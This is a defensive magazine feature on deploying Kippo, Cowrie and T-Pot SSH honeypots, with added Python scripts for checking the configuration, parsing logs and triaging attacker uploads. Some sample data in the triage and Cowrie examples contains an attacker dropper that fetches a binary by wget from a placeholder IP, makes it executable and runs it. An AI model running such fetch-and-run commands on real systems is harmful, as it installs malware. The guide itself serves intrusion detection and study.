CAPTURE INTRUDERS
Makefest 2017
Ethical hacking
This guide must be deployed for investigation or to protect an organisation only.
AT A GLANCE
Set up a honeypot, p22
Learn how to set up a medium-interaction SSH honeypot, which logs the entire shell interaction and brute-force attacks.
What we used: Kippo (https://github.com/desaster/kippo) and its fork called Cowrie. Kippo and Cowrie (www.micheloosterhof.com/cowrie) are easy to install and they are the most popular honeypots on the internet.

Processing the data, p24
Discover how to shape the attack and attacker profile by analysing the data within the kippo.log file and folders such as log and tty.
What we used: the Python script playlog.py to display a real-time replay of a recorded attacker shell interaction.

Visualise the data, p26
How to graphically see all the information collected by Kippo and Cowrie in a web browser.
What we used: Kippo-Graph (http://bruteforcelab.com/kippo-graph), a script to visualise statistics and any other data from a Kippo or Cowrie honeypot.

Question: are you inside a honeypot?, p28
Learn how to identify if you are trapped in a honeypot to improve your own designs.
What we used: techniques to figure out whether you are inside a virtual machine that's being used as a honeypot, and identifying a honeypot using Shodan (www.shodan.io) and an IP address.

IoT & ICS honeypots, p29
How a honeypot in an Industrial Control System (ICS) works and the most common honeypots that are used.
www.linuxuser.co.uk 21
Feature Capture intruders
Below Honeypots are classified by two main factors: the honeypot's target and the attacker's level of interaction

According to the target:
Research: allows the analysis of the data gathered; helps in discerning the risk and anticipating the countermeasures needed; gathers better information about the techniques used by the attackers.
Production: higher risk, because the honeypots are located within an organisation.
apt-get install python-dev openssl python-openssl python-pyasn1 python-twisted

One way to install Kippo is to download it directly from the GitHub repository by running:

git clone https://github.com/desaster/kippo

You can also install Kippo by using Subversion. If you don't have it installed, just type apt-get install subversion and then download the latest version with:

Don't forget to change your location to the directory where Kippo was installed.
First, let's cover Kippo's configuration. It's the key file, as it provides flexibility and personalisation of the final Kippo setup. The config file is called kippo.cfg.dist and should be copied or renamed as kippo.cfg. In Figure 1, Kippo has been set on port 2223. Later on, an iptables rule will need to be applied to forward all the incoming traffic that goes to port 22 to 2223. In this way, when an attacker scans the IP address, they'll find an SSH service on port 22 that's really our honeypot, and Kippo itself never has to run with the privileges needed to bind port 22:

Figure 1

Kippo's folders of interest
Before exposing the honeypot to the internet and starting to collect attacker information, it's necessary to list the folders where Kippo will keep the data collected. The first folder is called data. This stores the SSH host keys used by Kippo. This folder is where two text files are stored too. The first one is called lastlog.txt, which records the IP address, date and how long an attacker's activity lasted after logging into the system using the root account. This information is very useful and will be the first to be analysed during the information processing (see p24).
The second file is named userdb.txt and stores
users and their passwords that are allowed to access
the system. The format of userdb.txt must match the
following settings:
Username:UID:PlainText Password
Another important Kippo folder is dl. This stores any files uploaded by an attacker once the system is compromised. This enables us to retrieve and assess any possible malicious files to identify any known or new malware and understand the behaviour being logged.
Our third folder is called honeyfs and stores all the folders and files that are shown to the attacker. Folders such as etc and proc are already in honeyfs and inside each folder you'll find some files of interest for the attacker, but all of them are only text files.
To make the honeypot feel more realistic and attractive to a potential attacker, we can create other folder structures inside honeyfs. The better we simulate the Linux folder structure, the longer the attacker will remain inside our honeypot and the better the results we will get.
The fourth and final folder we will highlight is log. This folder is critical for processing all the information collected by your honeypot and reaching conclusions about an attack. The longer a honeypot is exposed to the internet, the better the quality of the information it collects. The file kippo.log and the folder tty sit inside the log folder. The tty folder records all the interactive sessions made by the attackers. These files should be processed to obtain a better understanding of the behaviour and goals of the attackers.
The kippo.log file stores unauthorised access attempts, connection attempts and all commands typed by an attacker during a session. This file must be

Above An example of kippo.cfg, where the SSH port has been set to port 2223 by changing the value of the ssh_port variable

HOW TO
Customise Kippo
The primary configuration file where we can enter values for all the directives and customise Kippo is called kippo.cfg.dist (kippo.cfg). This includes the listening port for incoming SSH connections and the location for files uploaded by an attacker:
ssh_port: Kippo's listening port, on which Kippo will be listening for all the requests. The preference would be to set this to port 22, although you would then have to run Kippo as root or a sudoer. Binding a high port such as 2223 and redirecting port 22 to it with the iptables rule mentioned on p22 keeps the honeypot running as an unprivileged user.
hostname: Shows the computer's name the attacker will see once they gain access. Try using appealing names such as PayrollPC.
log_path: The path where the log file will be stored for recording all actions and events taking place on the computer. This info will be stored in the kippo.log file; a folder called tty will store all session logs and is useful for analysis afterwards.
download_path: The path to the folder where all the files uploaded by the attacker will be stored.
download_limit_size: Sets the maximum size for any file that can be downloaded by the attacker. By default, this option is set to 0 (no limit).
content_path: The path where the virtual files are stored. By default, the path is set to the honeyfs folder, which also contains etc and proc.
txtcmds_path: The path to the folder where the output of programs executed is stored. If the attacker runs the command ifconfig, we could create a file ifconfig and put inside it the output to be displayed. By default, the path is txtcmds.
exec_enabled: This enables the option to run commands on the computer using ssh execCommand, which is disabled by default. Enabling this creates a bigger risk to your setup.
ssh_version: Indicates what version of SSH to display, which is output in string format.
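Before exposing the honeypot it is worth checking both the configuration and the credential list mechanically. The following is an added example written for this feature (it is not Kippo code): it parses a data/userdb.txt in the Username:UID:PlainText Password format described above and flags the kippo.cfg settings the Customise Kippo box warns about. The sample config and userdb text are constructed, the directive names are taken from the box (confirm them against your own kippo.cfg.dist), and the set of stock hostnames is an assumption.

```python
"""Pre-exposure sanity check of a Kippo setup: kippo.cfg directives and data/userdb.txt.

Added example for this feature; it is not Kippo code. Directive names follow the
Customise Kippo box; confirm them against the kippo.cfg.dist of the release you run.
Both sample inputs below are constructed for the example.
"""
import configparser

# Constructed sample kippo.cfg mirroring Figure 1 (port 2223, redirected from 22 by iptables).
SAMPLE_CFG = """\
[honeypot]
ssh_port = 2223
hostname = nas3
log_path = log
download_path = dl
download_limit_size = 0
txtcmds_path = txtcmds
exec_enabled = true
"""

# Constructed sample data/userdb.txt in Username:UID:PlainText Password form.
SAMPLE_USERDB = """\
root:0:123456
root:0:pass:word
admin:1000:admin
this line is malformed
"""

# Assumption: names shipped as defaults in kippo.cfg.dist / cowrie.cfg.dist.
# Leaving one in place fingerprints the host as a honeypot.
STOCK_HOSTNAMES = {"nas3", "svr03", "svr04"}


def load_userdb(text):
    """Parse userdb.txt. Returns (set of (user, password), list of rejected lines).

    The password is the third field and may itself contain ':' so the line is
    split at most twice; the UID must be numeric and the user name non-empty.
    """
    creds, rejected = set(), []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":", 2)
        if len(parts) != 3 or not parts[1].isdigit() or not parts[0]:
            rejected.append(line)
            continue
        user, _uid, password = parts
        creds.add((user, password))
    return creds, rejected


def login_allowed(creds, user, password):
    """Would the honeypot accept this attempt? Exact match only; no wildcards assumed."""
    return (user, password) in creds


def check_kippo_config(cfg_text):
    """Return findings as (severity, directive, message) for the settings the box warns about."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(cfg_text)
    hp = cfg["honeypot"]
    findings = []

    port = hp.getint("ssh_port", fallback=2222)
    if port < 1024:
        findings.append(("warn", "ssh_port",
                         "port %d needs root; bind a high port and redirect 22 to it with iptables" % port))
    if hp.getboolean("exec_enabled", fallback=False):
        findings.append(("warn", "exec_enabled",
                         "attackers can run commands through ssh execCommand; larger attack surface"))
    if hp.getint("download_limit_size", fallback=0) == 0:
        findings.append(("info", "download_limit_size",
                         "0 means no limit: a wget of a huge file can fill the disk under dl/"))
    if hp.get("hostname", fallback="") in STOCK_HOSTNAMES:
        findings.append(("info", "hostname",
                         "stock honeypot hostname; pick something believable such as PayrollPC"))
    return findings


if __name__ == "__main__":
    creds, rejected = load_userdb(SAMPLE_USERDB)
    print("credentials accepted:", sorted(creds), "rejected:", rejected)
    for sev, key, msg in check_kippo_config(SAMPLE_CFG):
        print("[%s] %s: %s" % (sev, key, msg))
```

Run it against your real kippo.cfg and data/userdb.txt by reading the files into the two functions; the exec_enabled and download_limit_size findings are the ones to resolve before the honeypot goes on the internet.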
Extract from kippo.log:
HoneyPotTransport,327,72.X.XX.XXX] login attempt [root/123456] succeeded
root authenticated with password
2017-07-07 02:48:31+0200 [SSHService ssh-userauth on HoneyPotTransport,327,72.X.XX.XXX] starting service ssh-connection
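As an added example for this feature (it is neither Kippo's playlog.py nor any Kippo tool), the following parses the login attempt lines kippo.log writes, in the shape shown above, and produces the brute-force figures Kippo-Graph later charts: total attempts and distinct IPs, IPs that exceed an attempt threshold, the credentials that succeeded and the most-tried passwords and usernames. The log lines are constructed and use documentation IP ranges rather than real attackers.

```python
"""Brute-force statistics from kippo.log.

Added example for this feature; not Kippo code. It understands only the
"login attempt [user/password] succeeded|failed" lines; every other line in
the log is skipped. SAMPLE_LOG is constructed (documentation IP ranges).
"""
import re
from collections import Counter

LOGIN_RE = re.compile(
    r"^(?P<ts>\S+ \S+) "
    r"\[SSHService ssh-userauth on HoneyPotTransport,(?P<sid>\d+),(?P<ip>[^\]]+)\] "
    r"login attempt \[(?P<user>[^/]*)/(?P<password>.*)\] (?P<result>succeeded|failed)$"
)

SAMPLE_LOG = """\
2017-07-07 02:48:29+0200 [SSHService ssh-userauth on HoneyPotTransport,327,203.0.113.5] login attempt [root/admin] failed
2017-07-07 02:48:30+0200 [SSHService ssh-userauth on HoneyPotTransport,327,203.0.113.5] login attempt [root/toor] failed
2017-07-07 02:48:31+0200 [SSHService ssh-userauth on HoneyPotTransport,327,203.0.113.5] login attempt [root/123456] succeeded
2017-07-07 02:48:31+0200 [SSHService ssh-userauth on HoneyPotTransport,327,203.0.113.5] root authenticated with password
2017-07-07 02:48:31+0200 [SSHService ssh-userauth on HoneyPotTransport,327,203.0.113.5] starting service ssh-connection
2017-07-07 03:10:02+0200 [SSHService ssh-userauth on HoneyPotTransport,330,198.51.100.7] login attempt [admin/admin] failed
2017-07-07 03:10:03+0200 [SSHService ssh-userauth on HoneyPotTransport,330,198.51.100.7] login attempt [admin/123456] failed
2017-07-07 03:10:04+0200 [SSHService ssh-userauth on HoneyPotTransport,330,198.51.100.7] login attempt [root/123456] succeeded
2017-07-07 04:00:00+0200 [SSHService ssh-userauth on HoneyPotTransport,331,192.0.2.9] login attempt [admin/1234] failed
"""


def parse_login_attempts(text):
    """One dict per login attempt: ts, sid (transport id), ip, user, password, result."""
    return [m.groupdict() for m in map(LOGIN_RE.match, text.splitlines()) if m]


def summarise(attempts, bruteforce_threshold=3, top=10):
    """The numbers Kippo-Graph's Overview and Input sections show, plus a brute-force list.

    An IP with at least bruteforce_threshold attempts is treated as a brute-forcer;
    tune the threshold to your exposure (dozens per minute is normal on port 22).
    """
    per_ip = Counter(a["ip"] for a in attempts)
    return {
        "total_attempts": len(attempts),
        "distinct_ips": len(per_ip),
        "bruteforcers": sorted(ip for ip, n in per_ip.items() if n >= bruteforce_threshold),
        "successful_logins": [(a["ip"], a["user"], a["password"])
                              for a in attempts if a["result"] == "succeeded"],
        "top_passwords": Counter(a["password"] for a in attempts).most_common(top),
        "top_usernames": Counter(a["user"] for a in attempts).most_common(top),
    }


if __name__ == "__main__":
    stats = summarise(parse_login_attempts(SAMPLE_LOG))
    for key, value in stats.items():
        print("%-18s %s" % (key, value))
```

To run it on a real honeypot, read log/kippo.log into parse_login_attempts; the successful_logins list is the set of credentials in userdb.txt that attackers actually hit, and the bruteforcers list is what you would feed into a blocklist on the production network (never on the honeypot itself, which should keep accepting them).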
QUICK TIP
File hunt
The files passwd and shadow, in the etc folder, are the most wanted by the attackers because these files store essential information related to the users and their passwords.

Below This table displays one successful access and several failed attempts that registered in our session, seen in the Kippo-Graph Network section

Kippo-Graph is a script created to visualise all the information harvested by the Kippo SSH honeypot. It uses some modules and APIs, such as Google's Visualization API for maps and Libchart PHP for drawing charts, to create several graphs and statistics based on all the attackers registered by the honeypot. Most of the information managed by Kippo-Graph is located in a MySQL database (the rest of the data collected is located in the log files) and it connects directly to all the MySQL tables using the parameters configured in the config.php file.
Kippo-Graph's current version can show several types of graphs (such as pie chart, column chart and so on) and presents information about, for example, the top ten passwords used by attackers, the top ten usernames, IP connections, connections by country and much more. All the information displayed can be exported to CSV format for further processing by any other log analyser application.
In Kippo-Graph's first section, called Overview, we can see a summary of all the data highlights stored by Kippo. In the section header, it shows some important overall information, such as: the total number of access attempts; the number of different IPs that tried to access the honeypot; and the activity timeframe in which all the information was registered. The next section, called Input, manages all the information that was registered from the keystrokes made by attackers. The first graph displayed in the section shows all the human activity inside the honeypot. In this way, Kippo-Graph can estimate and present how many attacks were made by humans and how many were automated. The table called Top 10 successful input shows the top ten commands run successfully by the attackers once they gained access to the honeypot. There's a special follow-up to the wget command to trace any file that the attacker fetched into the honeypot with it.
The next section, Playlog, shows off the most interesting feature of Kippo-Graph. This presents a step-by-step replication (like a frame-by-frame animation) of all the activity related to an attack. Basically, this section does the same thing as the playlog.py script (see p24), but this time it runs over the Kippo-Graph website. It also shows detailed data
HOW TO
Download, install and set up Kippo-Graph
focused on the attacker and sessions, such as in the following example:

Information about the attacker and session:
Session ID: 8816a99665ff11e79f03020000f0e954
Timestamp: 2017-07-11 06:09:46 (10.5 minutes)
Attacker's IP: 195.X.XX.XXX
Number of sessions for the attacker's IP: 1
Number of times the attacker's IP has been seen: 1
Total login attempts: 2
SSH credentials: root / 123456
Total number of input commands: 4 (0 failed commands)

It also shows detailed technical info about the attacker's IP and a map locating the attacker via IP geolocation.
The Network section displays a summary table with all the IP addresses registered by the honeypot. It also contains geolocation, sessions made, successful sessions and the date of the latest attempt made. Clicking on any of the sessions yields more information about it, such as the username and password used for access.
The Geoip section displays geolocation information related to attackers over a layer of Google Maps, but it's also possible to analyse the registered IPs using some online services that check their trustworthiness and whether they are registered as potentially dangerous sites. Some of the online services used in Kippo-Graph are McAfee and VirusTotal.

HOW TO
Analysing the files uploaded by the attackers
As a part of the post-attack analysis, we need to look at the dl folder and find possible files uploaded by the attackers. Most of these files will have some type of malware or tools to exploit system vulnerabilities. This info will help us to understand the type of attack made against the honeypot and to learn how to protect our real infrastructure. The first part of the analysis should be to send files through an online analysis service, for example, VirusTotal (www.virustotal.com). This service can detect viruses, worms, Trojans and other malware by just uploading the file to the website or pasting the URL (or IP, if we want to check an internet location). Look the file's hash up first and only then decide whether to upload the sample itself: an upload shares the file with every participating vendor and with other users of the service, which you may not want for a sample that contains credentials or was aimed at your organisation. VirusTotal has 56 different types of antivirus and 61 engines, as well as other tools that can be installed in browsers, smartphones or Windows. It acts like a sandbox (an environment totally isolated to simulate the file's execution within the operating system) and allows you to run the file and check its behaviour and the consequences of running it. There are other services worth investigating that act as sandboxes to check files, such as ThreatExpert (www.threatexpert.com) and Malwr (https://malwr.com).
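Before pushing anything from dl to VirusTotal, triage it locally. This added example (not a Kippo or VirusTotal tool) walks a dl folder, de-duplicates the files by SHA-256 (Kippo names each download after its time and URL, so the same dropper is captured again and again), records MD5 and SHA-256 so the hash can be looked up before any upload, guesses the type from the magic bytes and extracts the URLs from shell droppers, which point at the server hosting the next stage. make_sample_dir() builds a constructed dl folder; its filenames imitate Kippo's time_URL naming style and its contents are made up for the example.

```python
"""Triage the files in Kippo's dl/ folder before anything leaves your network.

Added example for this feature, not a Kippo or VirusTotal tool. make_sample_dir()
writes a constructed dl/ folder so the example runs offline.
"""
import hashlib
import os
import re
import tempfile

URL_RE = re.compile(rb"https?://[^\s'\"]+")


def file_kind(data):
    """Cheap type guess from leading bytes; 'unknown' means look closer by hand."""
    if data.startswith(b"\x7fELF"):
        return "elf"
    if data.startswith(b"#!"):
        return "script"
    if data.startswith(b"\x1f\x8b"):
        return "gzip"
    if data.startswith(b"PK\x03\x04"):
        return "zip"
    if data.startswith(b"MZ"):
        return "pe"
    return "unknown"


def triage_dl(directory):
    """One record per distinct file: sha256, md5, size, kind, names, urls.

    Records are keyed by SHA-256 so repeated captures of the same payload collapse
    into one entry whose names list shows how often (and from which URLs) it arrived.
    """
    records = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            continue
        with open(path, "rb") as f:
            data = f.read()
        sha = hashlib.sha256(data).hexdigest()
        if sha not in records:
            kind = file_kind(data)
            # URLs inside a dropper script are the next-stage hosts worth blocking/watching.
            urls = sorted({u.decode("ascii", "replace") for u in URL_RE.findall(data)}) if kind == "script" else []
            records[sha] = {
                "sha256": sha,
                "md5": hashlib.md5(data).hexdigest(),  # VirusTotal hash search takes MD5 or SHA-256
                "size": len(data),
                "kind": kind,
                "names": [],
                "urls": urls,
            }
        records[sha]["names"].append(name)
    return sorted(records.values(), key=lambda r: r["names"][0])


def make_sample_dir():
    """Constructed dl/ contents: an ELF captured twice, a dropper script, an unknown blob."""
    d = tempfile.mkdtemp(prefix="kippo-dl-")
    elf = b"\x7fELF\x02\x01\x01" + b"\x00" * 25
    samples = {
        "20170707024900_http___198_51_100_7_x86": elf,
        "20170707031005_http___198_51_100_7_x86": elf,
        "20170707031010_http___198_51_100_7_s_sh":
            b"#!/bin/sh\nwget http://198.51.100.7/x86 -O /tmp/x86\nchmod +x /tmp/x86\n/tmp/x86\n",
        "20170707040000_http___203_0_113_5_blob": b"\x00\x01\x02\x03",
    }
    for name, content in samples.items():
        with open(os.path.join(d, name), "wb") as f:
            f.write(content)
    return d


if __name__ == "__main__":
    for rec in triage_dl(make_sample_dir()):
        print(rec["kind"], rec["size"], rec["sha256"][:16], len(rec["names"]), "capture(s)", rec["urls"])
```

Point triage_dl at your real dl folder instead of make_sample_dir(). Do the hash look-ups (and any sandbox submission) from a machine that is not the honeypot, and keep the honeypot's copies read-only; an ELF from dl should never be executed outside an isolated analysis VM.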
04 Preparing Kippo-Graph
Copy the folder cloned or copied in Step 2 or 3 to /var/www/html, then change to that folder with cd /var/www/html/kippo-graph-1.5.1/. Next, make the generated-graphs folder writable by the web server. The quick route is sudo chmod 777 generated-graphs; on a Debian-based system, sudo chown www-data generated-graphs achieves the same without making the folder world-writable. Finally, config.php.dist must be copied to config.php before making any changes to it, with: sudo cp config.php.dist config.php.

05 Configuring Kippo-Graph
The configuration file config.php has many parameters that can be changed, but let's focus on a few significant ones: DB_HOST must be set to localhost or 127.0.0.1; DB_USER is the MySQL user created for Kippo; DB_PASS is the MySQL password; DB_NAME is Kippo's database name; and finally, DB_PORT is the port used to connect to the database (by default this is 3306).

06 Accessing Kippo-Graph
Once all the changes to the config.php file have been made to your satisfaction, you will need to restart the Apache service in order to apply the new configuration values. Once this is done, open your web browser and type the following: http://<yourIPorServer>/kippo-graph. At this point, you will see the main Kippo-Graph web page with your honeypot's activity overview, as displayed above. Don't serve this page on the honeypot's public address without authentication: anyone who finds it learns that the host is a honeypot and can read everything that was captured.
Above A diagram of a typical industrial network: engineering workstation, alarm servers, HMI, application servers, historian, control elements (PLCs, RTUs, SIS), industrial protocols and remote support

01 Introducing T-Pot
T-Pot combines the honeypots Conpot, Cowrie, Dionaea, ElasticPot, eMobility, Glastopf and honeytrap with Suricata (a network-monitoring security engine). It visualises the collected data with the ELK stack (Elasticsearch, Logstash and Kibana), which has a beautiful visualisation engine. T-Pot runs every daemon in a Docker container for good isolation.

02 Requirements and installation
T-Pot can be installed on a physical computer or in a VM using different setups. To avoid any issues during installation make sure your system meets the following spec: 4GB RAM (8GB recommended), 64GB hard disk (128GB recommended) and a working internet connection. Installing T-Pot is easy: just download the ISO file from http://community-honeypot.de/tpot.iso and run it in your designated setup.

03 Running T-Pot
The install takes about 30 minutes and will reboot. The user is tsec and you'll need the password you chose during install. All honeypots, depending on the type of setup chosen, will start automatically. To access T-Pot from the browser, type https://<your.ip>:64297 and log in with your credentials. Head to https://github.com/dtag-dev-sec/tpotce for more details.

Kippo is a good learning environment. It has been one of the most-used honeypots for a long time now, but as it's not as regularly updated, the chances of it being detected by an attacker are greater. Now we're familiar with the concepts, we need a more secure environment, so let's move on to Cowrie. Fortunately, migrating from Kippo to Cowrie is very easy because it's a fork of Kippo. In addition, Cowrie provides a host of new features such as SFTP and SCP file uploads, SSH exec command support, JSON format for log files and more. Cowrie is regularly updated and frequently patched, and as Cowrie is virtually the same as Kippo, it's 100 per cent compatible with Kippo-Graph, too.
Cowrie has a similar folder and file setup to Kippo. The dl, data, bin, honeyfs and txtcmds folders perform the same function as in Kippo. The log folder has almost the same files as Kippo, but the main configuration file for Cowrie is called cowrie.cfg.dist. As we did with Kippo, this file must be copied and renamed cowrie.cfg. Cowrie's new features add some new files, such as fs.pickle for the fake filesystem, which lives in the data folder, and the log file cowrie.json, which stores log records in JSON format. You'll also need to install a few dependencies:

apt-get install git python-virtualenv libmpfr-dev libssl-dev libmpc-dev libffi-dev
build-essential libpython-dev python2.7-minimal authbind

As we did with Kippo, it's recommended to create a separate user account for Cowrie and not use root. The authbind package in that list is what lets the unprivileged Cowrie user bind port 22 directly; it is the alternative to the iptables redirect we used for Kippo.

Installing Cowrie
You can clone Cowrie from the GitHub repository:

git clone https://github.com/micheloosterhof/cowrie

Cowrie configuration is almost a drop-in replacement for Kippo, but we need to make a few changes in cowrie.cfg:

# JSON based logging module
[database_jsonlog]
logfile = log/cowrie.json

# Enables passing commands using ssh execCommand
# e.g. ssh root@localhost <command>
# (default: false)
exec_enabled = true

# sftp_enabled enables the sftp subsystem
sftp_enabled = true

Note that exec_enabled and sftp_enabled are keys of the [honeypot] section, so place them under that header in cowrie.cfg rather than under [database_jsonlog]. As with Kippo, exec_enabled = true widens what an attacker can do through the honeypot, so turn it on deliberately.

To start Cowrie is pretty much the same as Kippo, so cd cowrie/ followed by ./start.sh.

QUICK TIP
Pi pots
The Raspberry Pi is an easy and cheap platform to deploy any kind of honeypot. Due to its small size and portability, a Pi is perfect for simulating a fake Wi-Fi access point.

High-interaction honeypots are the most difficult to detect, since they offer real services instead of simulated ones. Metasploit has some modules that can detect whether or not you are dealing with a honeypot and even has a Kippo SSH Honeypot Detector that uses the returned-messages method described above. Using the search engine Shodan (https://honeyscore.shodan.io), it's also possible to find out if an IP address is a honeypot without even connecting to it.

Honeypots to protect ICS and IoT devices
IoT and ICS (industrial control system) environments are suffering increasing numbers of attacks. Critical infrastructure, such as dams and power grids, is threatened by this type of attack. Stuxnet is the best-known case of an attack on an ICS, in this case the Natanz uranium enrichment facility in Iran, and attack techniques are becoming more sophisticated, so using honeypots is a good way to detect and study attacks before they can affect the real facilities. ICSes are often made up of several components, such as SCADA (supervisory control and data acquisition), PLCs (programmable logic controllers), RTUs (remote terminal units) and HMIs (human-machine interfaces). An ICS will also have its own internal computer network for services such as email, web services and so on. Therefore, it's possible to install some honeypots within the industrial network to simulate any of these services or tasks. There are honeypots designed
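Back to Cowrie's cowrie.json: the JSON log makes session reconstruction much simpler than parsing kippo.log. The following is an added example (not part of Cowrie) that groups the one-object-per-line events by session, then produces the same fields as Kippo-Graph's attacker-and-session panel (p26) and a plain replay of the commands the attacker typed. The event names and field names used (cowrie.session.connect, cowrie.login.failed, cowrie.login.success, cowrie.command.input, cowrie.session.file_download and cowrie.session.closed, with session, src_ip, username, password, input, url, shasum and duration) are assumed here rather than taken from the page, so check them against your own log before relying on the output. The sample lines are constructed.

```python
"""Per-session timelines from Cowrie's JSON log (log/cowrie.json).

Added example for this feature, not Cowrie code. Event ids and field names are
assumptions to verify against your own cowrie.json; SAMPLE_JSON is constructed.
"""
import json

SAMPLE_JSON = "\n".join([
    '{"eventid": "cowrie.session.connect", "session": "8816a996", "src_ip": "198.51.100.7", "timestamp": "2017-07-11T06:09:46.000000Z"}',
    '{"eventid": "cowrie.login.failed", "session": "8816a996", "src_ip": "198.51.100.7", "username": "root", "password": "admin", "timestamp": "2017-07-11T06:09:47.000000Z"}',
    '{"eventid": "cowrie.login.success", "session": "8816a996", "src_ip": "198.51.100.7", "username": "root", "password": "123456", "timestamp": "2017-07-11T06:09:48.000000Z"}',
    '{"eventid": "cowrie.command.input", "session": "8816a996", "src_ip": "198.51.100.7", "input": "uname -a", "timestamp": "2017-07-11T06:09:50.000000Z"}',
    '{"eventid": "cowrie.command.input", "session": "8816a996", "src_ip": "198.51.100.7", "input": "wget http://198.51.100.7/x86 -O /tmp/x86", "timestamp": "2017-07-11T06:09:55.000000Z"}',
    '{"eventid": "cowrie.session.file_download", "session": "8816a996", "src_ip": "198.51.100.7", "url": "http://198.51.100.7/x86", "shasum": "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef", "timestamp": "2017-07-11T06:09:56.000000Z"}',
    '{"eventid": "cowrie.command.input", "session": "8816a996", "src_ip": "198.51.100.7", "input": "chmod +x /tmp/x86", "timestamp": "2017-07-11T06:09:58.000000Z"}',
    '{"eventid": "cowrie.command.input", "session": "8816a996", "src_ip": "198.51.100.7", "input": "/tmp/x86", "timestamp": "2017-07-11T06:10:00.000000Z"}',
    '{"eventid": "cowrie.session.closed", "session": "8816a996", "src_ip": "198.51.100.7", "duration": 630.5, "timestamp": "2017-07-11T06:20:16.500000Z"}',
    '{"eventid": "cowrie.session.connect", "session": "9a01cc4d", "src_ip": "203.0.113.5", "timestamp": "2017-07-11T07:00:00.000000Z"}',
    '{"eventid": "cowrie.login.failed", "session": "9a01cc4d", "src_ip": "203.0.113.5", "username": "admin", "password": "admin", "timestamp": "2017-07-11T07:00:01.000000Z"}',
    '{"eventid": "cowrie.session.closed", "session": "9a01cc4d", "src_ip": "203.0.113.5", "duration": 2.1, "timestamp": "2017-07-11T07:00:02.100000Z"}',
])


def load_sessions(text):
    """Group cowrie.json events by session id, keeping only what the analysis needs."""
    sessions = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        s = sessions.setdefault(ev["session"], {
            "src_ip": ev.get("src_ip"), "logins": [], "credentials": None,
            "commands": [], "downloads": [], "duration": None,
        })
        eid = ev["eventid"]
        if eid in ("cowrie.login.failed", "cowrie.login.success"):
            ok = eid.endswith("success")
            s["logins"].append((ev["username"], ev["password"], ok))
            if ok:
                s["credentials"] = (ev["username"], ev["password"])
        elif eid == "cowrie.command.input":
            s["commands"].append(ev["input"])
        elif eid == "cowrie.session.file_download":
            s["downloads"].append((ev.get("url"), ev.get("shasum")))
        elif eid == "cowrie.session.closed":
            s["duration"] = ev.get("duration")
    return sessions


def session_card(sessions, session_id):
    """The fields of Kippo-Graph's 'Information about the attacker and session' panel."""
    s = sessions[session_id]
    return {
        "attacker_ip": s["src_ip"],
        "duration_minutes": round(s["duration"] / 60, 1) if s["duration"] is not None else None,
        "total_login_attempts": len(s["logins"]),
        "ssh_credentials": s["credentials"],
        "input_commands": len(s["commands"]),
        "downloads": len(s["downloads"]),
        # a session that logged in and typed something is worth replaying by hand
        "interactive": s["credentials"] is not None and len(s["commands"]) > 0,
    }


def playlog(sessions, session_id):
    """Plain-text replay of what the attacker typed, in order (playlog.py without the timing)."""
    s = sessions[session_id]
    user = s["credentials"][0] if s["credentials"] else "?"
    return "\n".join("%s@honeypot# %s" % (user, cmd) for cmd in s["commands"])


if __name__ == "__main__":
    sessions = load_sessions(SAMPLE_JSON)
    for sid in sessions:
        print(sid, session_card(sessions, sid))
        print(playlog(sessions, sid))
```

Feed it log/cowrie.json to get one card per session; the interactive flag separates the handful of sessions where a human (or a scripted post-login routine) actually ran commands from the mass of pure brute-force connections, and the downloads list gives you the URLs and hashes to match against the files in dl.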